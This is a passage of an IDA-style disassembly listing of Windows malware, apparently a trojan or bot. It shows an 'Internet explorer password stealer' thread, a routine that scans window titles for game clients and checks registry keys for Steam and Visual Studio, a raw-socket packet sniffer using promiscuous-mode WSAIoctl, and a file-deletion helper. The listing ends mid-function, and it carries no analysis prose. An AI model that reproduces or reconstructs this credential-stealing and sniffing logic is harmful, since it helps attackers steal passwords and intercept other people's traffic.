dd 0FFFFF028h, 64F44D8Bh, 0D89h, 5E5F0000h, 4C2C9h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415AF0 proc near ; CODE XREF: sub_40A9CF+7F�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_41DE80, 0
jnz short loc_415AFF
jmp short locret_415B3D
; ---------------------------------------------------------------------------
loc_415AFF: ; CODE XREF: sub_415AF0+B�j
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_415B15
jmp short locret_415B3D
; ---------------------------------------------------------------------------
loc_415B15: ; CODE XREF: sub_415AF0+21�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aInternetExplor ; "Internet explorer password stealer"
push 0
push [ebp+var_4]
push offset aOa ; "¸ÝoA"
call sub_4095A4
add esp, 10h
locret_415B3D: ; CODE XREF: sub_415AF0+D�j
; sub_415AF0+23�j
leave
retn
sub_415AF0 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov [ebp-4], ecx
mov eax, [ebp-4]
cmp dword ptr [eax], 0
jz short locret_415B5E
mov eax, [ebp-4]
mov eax, [eax]
mov ecx, [ebp-4]
mov ecx, [ecx]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
locret_415B5E: ; CODE XREF: .text:00415B4C�j
leave
retn
; ---------------------------------------------------------------------------
loc_415B60: ; DATA XREF: sub_415DFD+35�o
push ebp
mov ebp, esp
sub esp, 5D8h
push 1A7h
push dword ptr [ebp+8]
lea eax, [ebp-5B8h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
and dword ptr [ebp-5C4h], 0
and dword ptr [ebp-410h], 0
and dword ptr [ebp-40Ch], 0
and dword ptr [ebp-408h], 0
and dword ptr [ebp-404h], 0
and dword ptr [ebp-5BCh], 0
jmp short loc_415BC2
; ---------------------------------------------------------------------------
loc_415BB5: ; CODE XREF: .text:loc_415C50�j
mov eax, [ebp-5BCh]
inc eax
mov [ebp-5BCh], eax
loc_415BC2: ; CODE XREF: .text:00415BB3�j
cmp dword ptr [ebp-5BCh], 0FFFFh
jnb loc_415C55
push 400h
lea eax, [ebp-400h]
push eax
push dword ptr [ebp-5BCh]
call ds:dword_4171E4 ; GetWindowTextA
push 7
push offset aUnreal3 ; "Unreal3"
lea eax, [ebp-400h]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_415C0E
mov dword ptr [ebp-410h], 1
loc_415C0E: ; CODE XREF: .text:00415C02�j
push offset aWorldOfWarcraf ; "World Of Warcraft"
lea eax, [ebp-400h]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_415C2F
mov dword ptr [ebp-408h], 1
loc_415C2F: ; CODE XREF: .text:00415C23�j
push offset aConquer ; "[Conquer]"
lea eax, [ebp-400h]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_415C50
mov dword ptr [ebp-404h], 1
loc_415C50: ; CODE XREF: .text:00415C44�j
jmp loc_415BB5
; ---------------------------------------------------------------------------
loc_415C55: ; CODE XREF: .text:00415BCC�j
and dword ptr [ebp-5C0h], 0
lea eax, [ebp-5C0h]
push eax
push 20019h
push 0
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\VisualStudio\\6.0\\Set"...
push 80000002h
call ds:dword_417008 ; RegOpenKeyExA
test eax, eax
jnz short loc_415C88
mov dword ptr [ebp-5C4h], 1
loc_415C88: ; CODE XREF: .text:00415C7C�j
push dword ptr [ebp-5C0h]
call ds:dword_417028 ; RegCloseKey
and dword ptr [ebp-5C0h], 0
lea eax, [ebp-5C0h]
push eax
push 20019h
push 0
push offset aSoftwareValveS ; "Software\\Valve\\Steam"
push 80000001h
call ds:dword_417008 ; RegOpenKeyExA
test eax, eax
jnz short loc_415CC7
mov dword ptr [ebp-40Ch], 1
loc_415CC7: ; CODE XREF: .text:00415CBB�j
push dword ptr [ebp-5C0h]
call ds:dword_417028 ; RegCloseKey
movsx eax, byte ptr [ebp-41Ch]
test eax, eax
jz short loc_415D1E
cmp dword ptr [ebp-410h], 0
jnz short loc_415D1E
cmp dword ptr [ebp-5C4h], 0
jnz short loc_415D1E
cmp dword ptr [ebp-40Ch], 0
jnz short loc_415D1E
cmp dword ptr [ebp-408h], 0
jnz short loc_415D1E
cmp dword ptr [ebp-404h], 0
jnz short loc_415D1E
push dword ptr [ebp-5B8h]
call sub_409763
pop ecx
xor eax, eax
jmp locret_415DF9
; ---------------------------------------------------------------------------
loc_415D1E: ; CODE XREF: .text:00415CDC�j
; .text:00415CE5�j ...
cmp dword ptr [ebp-404h], 0
jz short loc_415D33
mov dword ptr [ebp-5C8h], offset aYes ; "Yes"
jmp short loc_415D3D
; ---------------------------------------------------------------------------
loc_415D33: ; CODE XREF: .text:00415D25�j
mov dword ptr [ebp-5C8h], offset aNo ; "No"
loc_415D3D: ; CODE XREF: .text:00415D31�j
cmp dword ptr [ebp-408h], 0
jz short loc_415D52
mov dword ptr [ebp-5CCh], offset aYes ; "Yes"
jmp short loc_415D5C
; ---------------------------------------------------------------------------
loc_415D52: ; CODE XREF: .text:00415D44�j
mov dword ptr [ebp-5CCh], offset aNo ; "No"
loc_415D5C: ; CODE XREF: .text:00415D50�j
cmp dword ptr [ebp-40Ch], 0
jz short loc_415D71
mov dword ptr [ebp-5D0h], offset aYes ; "Yes"
jmp short loc_415D7B
; ---------------------------------------------------------------------------
loc_415D71: ; CODE XREF: .text:00415D63�j
mov dword ptr [ebp-5D0h], offset aNo ; "No"
loc_415D7B: ; CODE XREF: .text:00415D6F�j
cmp dword ptr [ebp-5C4h], 0
jz short loc_415D90
mov dword ptr [ebp-5D4h], offset aYes ; "Yes"
jmp short loc_415D9A
; ---------------------------------------------------------------------------
loc_415D90: ; CODE XREF: .text:00415D82�j
mov dword ptr [ebp-5D4h], offset aNo ; "No"
loc_415D9A: ; CODE XREF: .text:00415D8E�j
cmp dword ptr [ebp-410h], 0
jz short loc_415DAF
mov dword ptr [ebp-5D8h], offset aYes ; "Yes"
jmp short loc_415DB9
; ---------------------------------------------------------------------------
loc_415DAF: ; CODE XREF: .text:00415DA1�j
mov dword ptr [ebp-5D8h], offset aNo ; "No"
loc_415DB9: ; CODE XREF: .text:00415DAD�j
push dword ptr [ebp-5C8h]
push dword ptr [ebp-5CCh]
push dword ptr [ebp-5D0h]
push dword ptr [ebp-5D4h]
push dword ptr [ebp-5D8h]
push offset dword_41D5CC
lea eax, [ebp-5B4h]
push eax
call sub_40D53F
add esp, 1Ch
push dword ptr [ebp-5B8h]
call sub_409763
pop ecx
xor eax, eax
locret_415DF9: ; CODE XREF: .text:00415D19�j
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415DFD proc near ; CODE XREF: sub_40A9CF+12FF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_415E17
jmp short locret_415E3F
; ---------------------------------------------------------------------------
loc_415E17: ; CODE XREF: sub_415DFD+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aListingInteres ; "Listing interesting processes"
push 0
push [ebp+var_4]
push offset loc_415B60
call sub_4095A4
add esp, 10h
locret_415E3F: ; CODE XREF: sub_415DFD+18�j
leave
retn
sub_415DFD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415E41 proc near ; CODE XREF: sub_415EB7+37�p
; sub_415EB7+59�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_415E52
; ---------------------------------------------------------------------------
loc_415E4B: ; CODE XREF: sub_415E41+69�j
; sub_415E41:loc_415EB1�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_415E52: ; CODE XREF: sub_415E41+8�j
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+eax*4], 0
jz short loc_415EB3
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_407ACA
add esp, 0Ch
test eax, eax
jz short loc_415EB1
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+eax*4+4], 0
jz short loc_415EAC
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_407ACA
add esp, 0Ch
test eax, eax
jz short loc_415EAC
jmp short loc_415E4B
; ---------------------------------------------------------------------------
loc_415EAC: ; CODE XREF: sub_415E41+49�j
; sub_415E41+67�j
push 1
pop eax
jmp short locret_415EB5
; ---------------------------------------------------------------------------
loc_415EB1: ; CODE XREF: sub_415E41+3A�j
jmp short loc_415E4B
; ---------------------------------------------------------------------------
loc_415EB3: ; CODE XREF: sub_415E41+1D�j
xor eax, eax
locret_415EB5: ; CODE XREF: sub_415E41+6E�j
leave
retn
sub_415E41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415EB7 proc near ; CODE XREF: .text:00416389�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+arg_C], 0
jz short loc_415EDD
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_407ACA
add esp, 0Ch
test eax, eax
jz short loc_415EDD
push 1
pop eax
jmp loc_415F67
; ---------------------------------------------------------------------------
loc_415EDD: ; CODE XREF: sub_415EB7+7�j
; sub_415EB7+1C�j
cmp [ebp+arg_8], 1
jb short loc_415EFF
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D6FC
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415EFF
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415EFF: ; CODE XREF: sub_415EB7+2A�j
; sub_415EB7+41�j
cmp [ebp+arg_8], 2
jb short loc_415F21
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D758
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415F21
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415F21: ; CODE XREF: sub_415EB7+4C�j
; sub_415EB7+63�j
cmp [ebp+arg_8], 3
jb short loc_415F43
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D7CC
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415F43
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415F43: ; CODE XREF: sub_415EB7+6E�j
; sub_415EB7+85�j
cmp [ebp+arg_8], 4
jb short loc_415F65
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D810
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415F65
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415F65: ; CODE XREF: sub_415EB7+90�j
; sub_415EB7+A7�j
xor eax, eax
loc_415F67: ; CODE XREF: sub_415EB7+21�j
; sub_415EB7+46�j ...
pop ebp
retn
sub_415EB7 endp
; ---------------------------------------------------------------------------
loc_415F69: ; DATA XREF: sub_41665C+A6�o
push ebp
mov ebp, esp
mov eax, 19B8h
call sub_416BC0
push edi
push 3ABh
push dword ptr [ebp+8]
lea eax, [ebp-1614h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
movsx eax, byte ptr [ebp-160Ch]
neg eax
sbb eax, eax
lea ecx, [ebp-160Ch]
and eax, ecx
mov [ebp-1624h], eax
push 0
push 3
push 2
call ds:dword_417218 ; socket
mov [ebp-104Ch], eax
cmp dword ptr [ebp-104Ch], 0FFFFFFFFh
jnz short loc_415FDE
push dword ptr [ebp-1614h]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_415FDE: ; CODE XREF: .text:00415FC9�j
push 0FFh
lea eax, [ebp-1254h]
push eax
call ds:dword_417260 ; gethostname
lea eax, [ebp-1254h]
push eax
call ds:dword_41723C ; gethostbyname
mov [ebp-1154h], eax
cmp dword ptr [ebp-1154h], 0
jnz short loc_41602B
push dword ptr [ebp-104Ch]
call ds:dword_417230 ; closesocket
push dword ptr [ebp-1614h]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_41602B: ; CODE XREF: .text:0041600A�j
push 10h
push 0
lea eax, [ebp-1048h]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov word ptr [ebp-1048h], 2
mov eax, [ebp-1154h]
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp-1044h], eax
push 10h
lea eax, [ebp-1048h]
push eax
push dword ptr [ebp-104Ch]
call ds:dword_417208 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_416093
push dword ptr [ebp-104Ch]
call ds:dword_417230 ; closesocket
push dword ptr [ebp-1614h]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_416093: ; CODE XREF: .text:00416072�j
mov dword ptr [ebp-1150h], 1
push 0
push 0
lea eax, [ebp-1620h]
push eax
push 0
push 0
push 4
lea eax, [ebp-1150h]
push eax
push 98000001h
push dword ptr [ebp-104Ch]
call ds:dword_41725C ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_4160EA
push dword ptr [ebp-104Ch]
call ds:dword_417230 ; closesocket
push dword ptr [ebp-1614h]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_4160EA: ; CODE XREF: .text:004160C9�j
lea eax, [ebp-1030h]
mov [ebp-161Ch], eax
and dword ptr [ebp-1628h], 0
and dword ptr [ebp-4], 0
push dword ptr [ebp-1610h]
mov eax, [ebp-1614h]
push dword ptr [eax]
push offset unk_41D9DC
lea eax, [ebp-140Ch]
push eax
call sub_40D53F
add esp, 10h
and byte ptr [ebp-1274h], 0
and byte ptr [ebp-114Ch], 0
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp-114Bh]
rep stosd
stosw
stosb
and byte ptr [ebp-1264h], 0
xor eax, eax
lea edi, [ebp-1263h]
stosd
stosb
lea eax, [ebp-114Ch]
push eax
call sub_40CF25
push eax
call sub_4044F7
pop ecx
pop ecx
lea eax, [ebp-1264h]
push eax
call sub_40CF25
push eax
call sub_4045B2
pop ecx
pop ecx
lea eax, [ebp-114Ch]
push eax
call ds:dword_417244 ; inet_addr
mov [ebp-1618h], eax
lea eax, [ebp-1264h]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp-1268h], ax
and byte ptr [ebp-1038h], 0
xor eax, eax
lea edi, [ebp-1037h]
stosd
stosb
lea eax, [ebp-1038h]
push eax
call sub_40CF25
push eax
call sub_404552
pop ecx
pop ecx
mov eax, [ebp-1044h]
mov [ebp-125Ch], eax
lea eax, [ebp-1038h]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp-1258h], ax
loc_4161E6: ; CODE XREF: .text:0041626E�j
; .text:004162A3�j ...
push 0
push 1028h
lea eax, [ebp-1030h]
push eax
push dword ptr [ebp-104Ch]
call ds:dword_417248 ; recv
mov [ebp-17ACh], eax
mov eax, [ebp-1614h]
cmp dword ptr [eax+4], 0
jz short loc_416217
jmp loc_416637
; ---------------------------------------------------------------------------
loc_416217: ; CODE XREF: .text:00416210�j
cmp dword ptr [ebp-17ACh], 0FFFFFFFFh
jz short loc_416229
cmp dword ptr [ebp-17ACh], 0
jnz short loc_41622E
loc_416229: ; CODE XREF: .text:0041621E�j
jmp loc_416637
; ---------------------------------------------------------------------------
loc_41622E: ; CODE XREF: .text:00416227�j
mov eax, [ebp-17ACh]
and byte ptr [ebp+eax-1030h], 0
mov eax, [ebp-161Ch]
mov al, [eax]
and al, 0Fh
movzx eax, al
mov ecx, [ebp-161Ch]
lea eax, [ecx+eax*4]
mov [ebp-1628h], eax
mov eax, [ebp-1628h]
lea ecx, [ebp-1030h]
sub eax, ecx
cmp eax, [ebp-17ACh]
jb short loc_416273
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416273: ; CODE XREF: .text:0041626C�j
mov eax, [ebp-1628h]
mov al, [eax+0Ch]
shr al, 4
and al, 0Fh
movzx eax, al
mov ecx, [ebp-1628h]
lea eax, [ecx+eax*4]
mov [ebp-4], eax
mov eax, [ebp-4]
lea ecx, [ebp-1030h]
sub eax, ecx
cmp eax, [ebp-17ACh]
jb short loc_4162A8
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_4162A8: ; CODE XREF: .text:004162A1�j
push dword ptr [ebp-4]
call sub_416B40 ; strlen
pop ecx
mov [ebp-17ACh], eax
mov eax, [ebp-161Ch]
movzx eax, byte ptr [eax+9]
cmp eax, 6
jnz loc_416632
movsx eax, byte ptr [ebp-127Eh]
test eax, eax
jz short loc_4162EB
mov eax, [ebp-161Ch]
mov eax, [eax+10h]
cmp eax, [ebp-125Ch]
jz short loc_4162EB
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_4162EB: ; CODE XREF: .text:004162D3�j
; .text:004162E4�j
movsx eax, byte ptr [ebp-1278h]
test eax, eax
jz short loc_41630C
mov eax, [ebp-161Ch]
mov eax, [eax+0Ch]
cmp eax, [ebp-125Ch]
jz short loc_41630C
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_41630C: ; CODE XREF: .text:004162F4�j
; .text:00416305�j
mov eax, [ebp-1628h]
mov ax, [eax]
push eax
call ds:dword_417238 ; htons
movzx eax, ax
movzx ecx, word ptr [ebp-1258h]
cmp eax, ecx
jnz short loc_416340
mov eax, [ebp-161Ch]
mov eax, [eax+0Ch]
cmp eax, [ebp-125Ch]
jnz short loc_416340
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416340: ; CODE XREF: .text:00416328�j
; .text:00416339�j
mov eax, [ebp-1628h]
mov ax, [eax]
push eax
call ds:dword_417238 ; htons
movzx eax, ax
movzx ecx, word ptr [ebp-1268h]
cmp eax, ecx
jnz short loc_416374
mov eax, [ebp-161Ch]
mov eax, [eax+0Ch]
cmp eax, [ebp-1618h]
jnz short loc_416374
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416374: ; CODE XREF: .text:0041635C�j
; .text:0041636D�j
push dword ptr [ebp-1624h]
push dword ptr [ebp-1610h]
push dword ptr [ebp-17ACh]
push dword ptr [ebp-4]
call sub_415EB7
add esp, 10h
test eax, eax
jz loc_416632
and dword ptr [ebp-19B8h], 0
jmp short loc_4163AF
; ---------------------------------------------------------------------------
loc_4163A2: ; CODE XREF: .text:loc_416413�j
mov eax, [ebp-19B8h]
inc eax
mov [ebp-19B8h], eax
loc_4163AF: ; CODE XREF: .text:004163A0�j
mov eax, [ebp-19B8h]
cmp eax, [ebp-17ACh]
jnb short loc_416415
mov eax, [ebp-4]
add eax, [ebp-19B8h]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jnz short loc_4163DA
mov eax, [ebp-4]
add eax, [ebp-19B8h]
mov byte ptr [eax], 2Dh
loc_4163DA: ; CODE XREF: .text:004163CC�j
mov eax, [ebp-4]
add eax, [ebp-19B8h]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jnz short loc_4163F7
mov eax, [ebp-4]
add eax, [ebp-19B8h]
mov byte ptr [eax], 3Eh
loc_4163F7: ; CODE XREF: .text:004163E9�j
mov eax, [ebp-4]
add eax, [ebp-19B8h]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_416413
mov eax, [ebp-4]
add eax, [ebp-19B8h]
mov byte ptr [eax], 2Eh
loc_416413: ; CODE XREF: .text:00416405�j
jmp short loc_4163A2
; ---------------------------------------------------------------------------
loc_416415: ; CODE XREF: .text:004163BB�j
and dword ptr [ebp-19B8h], 0
mov eax, [ebp-19B8h]
mov [ebp-17ACh], eax
jmp short loc_416437
; ---------------------------------------------------------------------------
loc_41642A: ; CODE XREF: .text:00416470�j
; .text:00416483�j ...
mov eax, [ebp-19B8h]
inc eax
mov [ebp-19B8h], eax
loc_416437: ; CODE XREF: .text:00416428�j
mov eax, [ebp-4]
add eax, [ebp-19B8h]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_41645F
mov eax, [ebp-4]
add eax, [ebp-17ACh]
mov ecx, [ebp-4]
add ecx, [ebp-19B8h]
mov cl, [ecx]
mov [eax], cl
jmp short loc_4164AA
; ---------------------------------------------------------------------------
loc_41645F: ; CODE XREF: .text:00416445�j
mov eax, [ebp-4]
add eax, [ebp-19B8h]
movsx eax, byte ptr [eax]
cmp eax, 7Fh
jl short loc_416472
jmp short loc_41642A
; ---------------------------------------------------------------------------
loc_416472: ; CODE XREF: .text:0041646E�j
mov eax, [ebp-4]
add eax, [ebp-19B8h]
movsx eax, byte ptr [eax]
cmp eax, 1Fh
jg short loc_416485
jmp short loc_41642A
; ---------------------------------------------------------------------------
loc_416485: ; CODE XREF: .text:00416481�j
mov eax, [ebp-4]
add eax, [ebp-17ACh]
mov ecx, [ebp-4]
add ecx, [ebp-19B8h]
mov cl, [ecx]
mov [eax], cl
mov eax, [ebp-17ACh]
inc eax
mov [ebp-17ACh], eax
jmp short loc_41642A
; ---------------------------------------------------------------------------
loc_4164AA: ; CODE XREF: .text:0041645D�j
cmp dword ptr [ebp-17ACh], 0
jnz short loc_4164B8
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_4164B8: ; CODE XREF: .text:004164B1�j
push 100h
mov eax, [ebp-161Ch]
push dword ptr [eax+0Ch]
call ds:dword_41721C ; inet_ntoa
push eax
lea eax, [ebp-19B4h]
push eax
call sub_407A56
add esp, 0Ch
push 100h
mov eax, [ebp-161Ch]
push dword ptr [eax+10h]
call ds:dword_41721C ; inet_ntoa
push eax
lea eax, [ebp-18B0h]
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp-1628h]
mov ax, [eax+2]
push eax
call ds:dword_417238 ; htons
movzx eax, ax
push eax
lea eax, [ebp-18B0h]
push eax
mov eax, [ebp-1628h]
mov ax, [eax]
push eax
call ds:dword_417238 ; htons
movzx eax, ax
push eax
lea eax, [ebp-19B4h]
push eax
push offset dword_41D9A8
lea eax, [ebp-17A8h]
push eax
call sub_416B5E ; sprintf
add esp, 18h
mov [ebp-18B4h], eax
mov eax, 180h
sub eax, [ebp-18B4h]
push eax
push dword ptr [ebp-4]
mov eax, [ebp-18B4h]
lea eax, [ebp+eax-17A8h]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp-17A8h]
push eax
push offset aS ; "%s"
lea eax, [ebp-140Ch]
push eax
call sub_40D53F
add esp, 0Ch
push 3E8h
call ds:dword_41709C ; Sleep
mov eax, [ebp-1614h]
cmp dword ptr [eax+4], 0
jz short loc_4165AD
jmp loc_416655
; ---------------------------------------------------------------------------
loc_4165AD: ; CODE XREF: .text:004165A6�j
mov eax, 180h
sub eax, [ebp-18B4h]
dec eax
mov [ebp-17B0h], eax
loc_4165BF: ; CODE XREF: .text:00416630�j
mov eax, [ebp-17B0h]
cmp eax, [ebp-17ACh]
jnb short loc_416632
push 180h
mov eax, [ebp-4]
add eax, [ebp-17B0h]
push eax
lea eax, [ebp-17A8h]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp-17A8h]
push eax
push offset aS ; "%s"
lea eax, [ebp-140Ch]
push eax
call sub_40D53F
add esp, 0Ch
push 3E8h
call ds:dword_41709C ; Sleep
mov eax, [ebp-1614h]
cmp dword ptr [eax+4], 0
jz short loc_41661F
jmp short loc_416653
; ---------------------------------------------------------------------------
loc_41661F: ; CODE XREF: .text:0041661B�j
mov eax, [ebp-17B0h]
add eax, 17Fh
mov [ebp-17B0h], eax
jmp short loc_4165BF
; ---------------------------------------------------------------------------
loc_416632: ; CODE XREF: .text:004162C4�j
; .text:00416393�j ...
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416637: ; CODE XREF: .text:00416212�j
; .text:loc_416229�j ...
push dword ptr [ebp-104Ch]
call ds:dword_417230 ; closesocket
push dword ptr [ebp-1614h]
call sub_409763
pop ecx
xor eax, eax
jmp short loc_416657
; ---------------------------------------------------------------------------
loc_416653: ; CODE XREF: .text:0041661D�j
jmp short loc_416637
; ---------------------------------------------------------------------------
loc_416655: ; CODE XREF: .text:004165A8�j
jmp short loc_416637
; ---------------------------------------------------------------------------
loc_416657: ; CODE XREF: .text:00415FD9�j
; .text:00416026�j ...
pop edi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41665C proc near ; CODE XREF: sub_40A9CF+9FE�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push 3ABh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41667B
jmp locret_41670F
; ---------------------------------------------------------------------------
loc_41667B: ; CODE XREF: sub_41665C+18�j
cmp [ebp+arg_4], 0
jz short loc_41668F
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
jmp short loc_416696
; ---------------------------------------------------------------------------
loc_41668F: ; CODE XREF: sub_41665C+23�j
mov [ebp+var_8], 3
loc_416696: ; CODE XREF: sub_41665C+31�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov [eax+4], ecx
cmp [ebp+arg_8], 0
jz short loc_4166AD
mov eax, [ebp+arg_8]
mov [ebp+var_C], eax
jmp short loc_4166B4
; ---------------------------------------------------------------------------
loc_4166AD: ; CODE XREF: sub_41665C+47�j
mov [ebp+var_C], offset byte_41DE30
loc_4166B4: ; CODE XREF: sub_41665C+4F�j
push 200h
push [ebp+var_C]
mov eax, [ebp+var_4]
add eax, 8
push eax
call sub_407A56
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 208h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_4]
push dword ptr [eax+4]
push offset dword_41DA10
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset loc_415F69
call sub_4095A4
add esp, 14h
locret_41670F: ; CODE XREF: sub_41665C+1A�j
leave
retn
sub_41665C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416711 proc near ; CODE XREF: sub_4167B9+6�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41673B
push [ebp+var_4]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
jmp short locret_41673D
; ---------------------------------------------------------------------------
loc_41673B: ; CODE XREF: sub_416711+1A�j
xor eax, eax
locret_41673D: ; CODE XREF: sub_416711+28�j
leave
retn
sub_416711 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41673F proc near ; CODE XREF: sub_40A9CF+C23�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41679C
push 2
push 0
push [ebp+var_4]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_4]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_8], eax
push 0
push 0
push [ebp+var_4]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_4]
call sub_416B82 ; fclose
pop ecx
mov eax, [ebp+var_8]
inc eax
neg eax
sbb eax, eax
and eax, [ebp+var_8]
jmp short locret_41679E
; ---------------------------------------------------------------------------
loc_41679C: ; CODE XREF: sub_41673F+1B�j
xor eax, eax
locret_41679E: ; CODE XREF: sub_41673F+5B�j
leave
retn
sub_41673F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167A0 proc near ; CODE XREF: sub_4167B9+13�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call ds:dword_4170AC ; DeleteFileA
test eax, eax
jz short loc_4167B5
push 1
pop eax
jmp short loc_4167B7
; ---------------------------------------------------------------------------
loc_4167B5: ; CODE XREF: sub_4167A0+E�j
xor eax, eax
loc_4167B7: ; CODE XREF: sub_4167A0+13�j
pop ebp
retn
sub_4167A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167B9 proc near ; CODE XREF: sub_402698+1D9�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_416711
pop ecx
test eax, eax
jz short loc_4167D9
push [ebp+arg_0]
call sub_4167A0
pop ecx
neg eax
sbb eax, eax
inc eax
jmp short loc_4167DB
; ---------------------------------------------------------------------------
